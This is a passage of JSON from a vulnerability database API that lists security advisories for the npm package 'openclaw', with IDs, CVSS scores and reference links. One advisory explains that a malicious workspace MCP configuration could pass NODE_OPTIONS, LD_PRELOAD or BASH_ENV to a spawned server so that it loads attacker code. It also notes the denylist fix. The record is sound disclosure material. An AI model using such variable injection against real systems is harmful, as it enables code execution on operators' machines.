                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-p6j4-wvmc-vx2h"
            ],
            "risk_score": 3.3,
            "exploitability": "0.5",
            "weighted_severity": "6.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rf6b-q7cj-jbgc"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89057?format=api",
            "vulnerability_id": "VCID-rkx2-eq2x-q7d1",
            "summary": "Duplicate Advisory: OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-4qwc-c7g9-4xcw. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unbounded memory allocation vulnerability in remote media HTTP error handling that allows attackers to trigger excessive memory consumption. Attackers can send crafted HTTP error responses with large bodies to remote media endpoints, causing the application to allocate unbounded memory before failure handling occurs.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hm63-vwj4-mj2q",
                    "reference_id": "GHSA-hm63-vwj4-mj2q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hm63-vwj4-mj2q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-hm63-vwj4-mj2q"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rkx2-eq2x-q7d1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89604?format=api",
            "vulnerability_id": "VCID-rr6t-1193-ybgz",
            "summary": "OpenClaw: MCP stdio server env could load dangerous startup variables from workspace config\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace MCP stdio configuration could pass dangerous process-startup environment variables such as `NODE_OPTIONS`, `LD_PRELOAD`, or `BASH_ENV` to the spawned MCP server process. In a malicious workspace, this could make the MCP child load attacker-controlled code when the operator starts a session that uses that MCP server.\n\nThe impact is limited to local/workspace trust boundaries and requires the operator to run OpenClaw in a workspace containing the malicious MCP configuration. Severity is therefore medium, not high/critical.\n\n## Fix\n\nOpenClaw now filters MCP stdio environment entries through the host environment safety denylist before spawning stdio MCP servers.\n\nFix commits:\n\n- `62fa5071896e95edc7f67d1cebc70a2859e283af`\n- `85d86ebc4bf3d2226d39d132a484f4f7a299fa1b`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44995",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01944",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01954",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01946",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44995"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
